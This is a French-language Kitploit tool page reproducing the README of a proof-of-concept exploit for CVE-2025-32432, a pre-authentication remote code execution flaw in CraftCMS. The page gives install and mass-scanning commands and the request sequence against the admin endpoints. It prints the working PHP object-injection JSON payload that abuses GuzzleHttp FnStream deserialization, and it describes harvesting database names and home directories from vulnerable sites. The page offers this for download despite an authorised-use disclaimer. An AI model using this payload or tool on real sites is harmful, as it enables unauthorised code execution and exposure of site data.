Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sachinart/cve-2025-32432
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Voir le dépôt
2743il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt contient un script d'exploitation de type preuve de concept pour CVE-2025-32432, une vulnérabilité d'exécution de code à distance (RCE) avant authentification affectant CraftCMS versions 4.x et 5.x. La vulnérabilité se situe dans la fonctionnalité de génération de transformations d'actifs de CraftCMS.

Partager

Exploit CraftCMS CVE-2025-32432 par Chirag Artani

Aperçu

Ce dépôt contient un script d'exploit de preuve de concept pour CVE-2025-32432, une vulnérabilité d'exécution de code à distance (RCE) sans authentification affectant CraftCMS versions 4.x et 5.x. La vulnérabilité se situe dans la fonctionnalité de génération de transformations de ressources de CraftCMS.

Ce script d'exploit automatise la détection et la vérification de la vulnérabilité en :

  1. Extrayant les jetons CSRF du tableau de bord d'administration de CraftCMS
  2. Exploitant la vulnérabilité via une injection d'objet PHP
  3. Vérifiant le succès de l'exploitation en extrayant des informations système

Avertissement

⚠️ Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

Utilisez cet outil uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test. Tester sans autorisation est illégal et contraire à l'éthique.

Fonctionnalités

  • Prise en charge du scan d'une seule cible et de plusieurs cibles (à partir d'un fichier)
  • Capacité multi-threads pour un scan plus rapide de plusieurs cibles
  • Sortie détaillée incluant le nom de la base de données et le répertoire personnel
  • Génération d'un rapport CSV pour les cibles vulnérables
  • Contournement de la vérification SSL pour tester avec des certificats auto-signés
  • Gestion robuste des erreurs

Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Installer les dépendances requises
pip install -r requirements.txt

Prérequis

  • Python 3.6+
  • Paquets Python requis (voir requirements.txt) :
    • requests
    • beautifulsoup4
    • urllib3

Utilisation

Cible unique

Pour scanner une seule cible :

root@kitploit:~
python3 craftcms_rce.py -u example.com

Cibles multiples

Pour scanner plusieurs cibles à partir d'un fichier (une URL par ligne) :

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Où -t spécifie le nombre de threads à utiliser (par défaut 5).

Options

root@kitploit:~
-u, --url     URL unique à tester
-f, --file    Fichier contenant les URLs à tester (une par ligne)
-t, --threads Nombre de threads (par défaut : 5)
-h, --help    Afficher le message d'aide et quitter

Sortie

Le script affiche les résultats dans la console et enregistre les cibles vulnérables dans vulnerable.txt au format CSV avec les colonnes suivantes :

  • URL
  • Valeur CRAFT_DB_DATABASE (nom de la base de données)
  • Chemin du répertoire HOME
  • Autres informations système

Exemple de sortie console :

root@kitploit:~
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

Comment fonctionne la vulnérabilité

Cette vulnérabilité exploite un problème de désérialisation dans CraftCMS. L'exploit :

  1. Envoie une requête GET à /index.php?p=admin/dashboard pour récupérer un jeton CSRF
  2. Envoie une requête POST à /index.php?p=admin/actions/assets/generate-transform avec une charge utile JSON spécialement conçue
  3. La charge utile inclut un objet PHP qui est désérialisé, ce qui conduit à une exécution de code arbitraire via la classe GuzzleHttp\Psr7\FnStream
  4. L'exploitation réussie est vérifiée en exécutant phpinfo() et en extrayant des informations système spécifiques

Détails techniques

L'exploit tire parti d'une désérialisation non sécurisée dans le processus de génération des transformations de ressources. Le chemin de code vulnérable permet à un attaquant d'injecter un objet PHP personnalisé qui est désérialisé, conduisant à une exécution de code arbitraire.

Les composants clés de la charge utile :

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Contribuer

Les contributions, problèmes et demandes de fonctionnalités sont les bienvenus ! N'hésitez pas à consulter la page des problèmes.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Références

  • Détails de CVE-2025-32432
  • Avis de sécurité CraftCMS

Auteur

  • Nicolas Bourras (Orange Cyberdefense) - Découverte originale de la vulnérabilité
  • Chirag Artani - Auteur du script d'exploit
Télécharger l’outil